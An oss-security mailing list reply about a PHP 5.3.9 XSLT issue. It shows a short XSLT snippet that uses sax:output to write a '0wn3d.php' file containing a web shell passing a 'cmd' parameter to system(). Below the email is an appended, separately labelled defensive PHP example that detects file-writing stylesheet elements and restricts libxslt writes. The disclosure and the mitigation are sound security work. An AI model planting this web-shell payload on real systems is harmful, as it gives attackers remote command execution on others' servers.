Date: Sat, 14 Jan 2012 16:03:25 -0300
From: Ignacio Espinosa <osu@...dvis.net>
To: oss-security@...ts.openwall.com
Cc: Kurt Seifried <kseifried@...hat.com>, Nicolas Grégoire <nicolas.gregoire@...rri.fr>
Subject: Re: CVE affected for PHP 5.3.9 ?

On Fri, 13 Jan 2012 13:50:59 -0700
Kurt Seifried <kseifried@...hat.com> wrote:
> [...]
> Ok I'm still not clear on what the security claim is. Are you saying you
> can cause arbitrary text output via XSL/XML mangling tricks? And
> combined with having a script that uses something like "<sax:output
> href="0wn3d.php" method="text">" you can put arbitrary text content into
> this file which could then result in the file being parsed? The problem
> is you'd have to write a script that does this, writes to a local file
> with a file ending in .php or .shtml or whatever, in which case it's
> pretty clear the script writer MEANT to do that. Again I'm still not
> clear on what/how a security boundary is being crossed. How does this
> elevate privileges or give you remote access that you wouldn't already
> if you can upload arbitrary PHP scripts?
> 
> 

You don't need to upload arbitrary php scripts to make this work. Just uploading a crafted xslt file will create (before the patch) a file with arbitrary content, php code for example, as write access is set by default.

-- snip --
        <sax:output href="0wn3d.php" method="text">
        <xsl:value-of select="'&lt;?php system(\$_GET[&quot;cmd&quot;]);?&gt;'"/>
-- snip --


-- 
Ignacio Espinosa <osu@...dvis.net>
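Added example, not code from this thread or from PHP itself: a transform wrapper that rejects stylesheets containing the result-document extension elements (sax:output and its relatives) and, as a second layer, uses XSLTProcessor::setSecurityPrefs() to forbid file and directory writes inside libxslt. It assumes PHP 5.3.9 or later, where that method and the XSL_SECPREF_* constants exist; the element names and namespace URIs are the ones libxslt registers for these extensions.

```php
<?php
// Added example: harden XSLTProcessor against stylesheets that write files.
// Assumes PHP >= 5.3.9 (XSLTProcessor::setSecurityPrefs, XSL_SECPREF_* constants).

// Extension elements libxslt implements as "write a result document to href",
// with the namespace URIs libxslt registers for each of them.
function resultDocumentElements() {
    return array(
        array('http://icl.com/saxon',                 'output'),
        array('http://www.jclark.com/xt',             'document'),
        array('http://exslt.org/common',              'document'),
        array('http://www.w3.org/1999/XSL/Transform', 'document'),
    );
}

// Detection: true if the stylesheet contains any file-writing element.
function stylesheetWritesFiles(DOMDocument $xsl) {
    foreach (resultDocumentElements() as $el) {
        list($ns, $local) = $el;
        if ($xsl->getElementsByTagNameNS($ns, $local)->length > 0) {
            return true;
        }
    }
    return false;
}

// Mitigation: reject stylesheets that try to write, and even if one slips
// through, have libxslt itself refuse file, directory and network writes.
function safeTransform(DOMDocument $xml, DOMDocument $xsl) {
    if (stylesheetWritesFiles($xsl)) {
        error_log('rejected XSLT stylesheet: contains a result-document element');
        return false;
    }
    $proc = new XSLTProcessor();
    $proc->setSecurityPrefs(XSL_SECPREF_WRITE_FILE
        | XSL_SECPREF_CREATE_DIRECTORY
        | XSL_SECPREF_READ_NETWORK
        | XSL_SECPREF_WRITE_NETWORK);
    $proc->importStylesheet($xsl);
    return $proc->transformToXml($xml);
}

// Constructed sample: the sax:output element from the thread, with a benign body.
$xsl = new DOMDocument();
$xsl->loadXML('<xsl:stylesheet version="1.0"'
    . ' xmlns:xsl="http://www.w3.org/1999/XSL/Transform"'
    . ' xmlns:sax="http://icl.com/saxon">'
    . '<xsl:template match="/"><sax:output href="0wn3d.php" method="text">'
    . 'x</sax:output></xsl:template></xsl:stylesheet>');
$xml = new DOMDocument();
$xml->loadXML('<root/>');
var_dump(safeTransform($xml, $xsl)); // transform result, or false if rejected
```

The detection pass is what gives you a log line to alert on; the setSecurityPrefs() call is the control that holds even for stylesheets the scan does not recognise.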
